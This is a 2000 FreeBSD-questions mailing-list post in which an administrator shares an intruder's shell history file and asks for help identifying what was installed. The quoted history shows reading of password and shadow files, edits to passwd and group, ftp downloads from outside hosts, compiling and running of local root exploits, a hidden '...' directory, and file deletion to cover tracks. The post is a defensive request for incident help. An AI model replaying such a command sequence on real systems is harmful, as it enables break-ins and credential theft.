From owner-freebsd-questions Mon Dec 18 12: 6:49 2000 From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:06:46 2000 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from marlo.eagle.ca (marlo.eagle.ca [209.167.16.10]) by hub.freebsd.org (Postfix) with ESMTP id 5325B37B402 for ; Mon, 18 Dec 2000 12:06:46 -0800 (PST) Received: from phantom (phantom.eagle.ca [209.167.16.15]) by marlo.eagle.ca (8.11.0/8.11.0) with SMTP id eBIK2mm04443 for ; Mon, 18 Dec 2000 15:02:48 -0500 (EST) (envelope-from freymann@eagle.ca) Reply-To: From: "Gerald T. Freymann" To: "Questions" Subject: Hacker history file - OUCH Date: Mon, 18 Dec 2000 15:06:32 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Seems we have an intruder on one of our boxes... the .history file from the troubled account follows: cd bnc ls ./bash who cd /etc more passwd ps -l ls -l more pwd.db more hosts pico adduser.conf.bak pico group su user pico group.bak pico ftpuser O pico ftpusers su toor su operator id pico spwd.db su wheel pico passwd cd /var/tmp ls -a cd ... ls -a cd .. ls -l ls -al cd ... ftp copper.he.net chmod u+x xcon ./xcon id rm * ls who cd /var/tmp ls -a ls -al cd ... ls -a ftp cih.edu.mx ls cc bsd1 bsd-cron.c cc -o bsd1 bsd-cron.c ./bsd1 id cc -o bsd2 bsd2.c ./bsd2 id ls ftp cih.edu.mx ./bsd sh ./bsd.sh chmod u+x bsd.sh ./bsd.sh /tmp/sh id ls cc -o bsdsmail bsdsmail.c ./bsdsmail ls -a pico hack ls pico user.inf ls id rm * exit Anybody recognize what the intruder has set up? -Gerry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message